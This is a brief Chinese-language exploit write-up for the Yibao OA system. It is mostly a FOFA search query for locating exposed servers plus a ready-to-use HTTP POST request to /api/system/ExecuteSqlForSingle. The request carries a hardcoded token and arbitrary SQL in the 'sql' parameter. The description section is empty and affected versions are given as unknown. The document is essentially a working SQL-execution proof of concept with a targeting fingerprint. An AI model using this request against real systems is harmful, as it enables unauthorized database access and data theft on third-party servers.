漏洞描述
影响版本
不详
检索特征
FOFA:title=“欢迎登录易宝OA系统” || banner=“易宝OA”
漏洞复现
POST /api/system/ExecuteSqlForSingle HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 103
token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)
&strParameters